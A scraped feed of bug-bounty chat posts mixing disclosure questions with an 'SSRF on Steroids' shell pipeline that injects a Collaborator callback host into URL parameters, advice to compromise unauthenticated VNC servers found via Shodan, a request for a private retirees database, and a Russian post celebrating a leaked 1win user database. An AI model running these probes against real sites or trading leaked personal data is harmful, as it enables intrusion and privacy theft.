3186
Talk and help about bugbounty
https://vijetareigns.medium.com/pii-disclosure-worth-750-758b72e7e8ca
Читать полностью…
looking for private Indian retirees database or government database.
Читать полностью…
i hav the complete information which i don't want to share here , i already report to hackerone disclosure assistance but no response as of yet .. anything i could do ?? please help
Читать полностью…
can i learn hacking for 2 or 3 months and then make money? because I come from a poor family, money is very important to me😢
Читать полностью…
Bug Bounty Tips!!! 😎😎😎👌👌👌👌
SSRF on Steroids 🔥🔥☄️☄️☄️☄️☄️
Methodology
Step 1: Subdomain Enumeration
•DNS Dumpster
•Sublist3r
•Amass
•Google Dorking
•Certificate Transparency Logs
•subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Injection Burp Collaborator URL in Parameters
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
Soc Analyst
Splunk Admin
Ibm Qradar Admin
Videos docs and interview questions
Available
Or you can find VNC's that have no authentication on shodan and you can compromise
Читать полностью…
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5060/tcp open sip
5061/tcp open sip-tls
5222/tcp open xmpp-client
8443/tcp open https-alt
how can i exploit
В сеть утекла база данных 1win.
На днях на форуме Exploit появился тред, куда новоиспеченный юзер залил несколько ссылок на интересные архивы:
— Таблица с данными пользователей на 95млн строк
— Таблица с данными партнеров 500к строк
— Таблица депозитов 450млн строк
— Таблица выводов на 80млн строк🤡
Среди слитой информации есть реальные имена, телефонные номера, балансы игроков и партнеров, телеграм-аккаунты и многое другое. На владельца 1win даже сделали деанон😁.
Данные приближенных сотрудников также слили, вплоть до мобильных номеров.
P.S 450млн депозитов и 80млн выводов…
🧑💻Этичный Хакер
Aao track pant hellicopter wagera ki bug site (sure ship) available
Читать полностью…
Have you been waiting for more than a week from hackerone?
Читать полностью…
are you saying Hackerone will take the report as their own ?
Читать полностью…
i found a sensitive exposure bug on a web server .. and the organization that is link to the server doesn't reply my email .. how do i do it ??
Читать полностью…
if you started this journey you can't know the time you'll get your first bounty some people it took for them a year or more and others just some days it's more about if you love this field or not and surely you will get exhausted in the middle of the way because of the pressure that's why people often take it just as a part-time.
Читать полностью…
BeginHacks" rel="nofollow">https://www.youtube.com/@BeginHacks
Читать полностью…
Веду поиск людей, заинтересованных в дополнительном доходе на удаленке. Частичная занятость, от 18 лет.
Кoму интереснo - стaвьте + в личные сoобщения.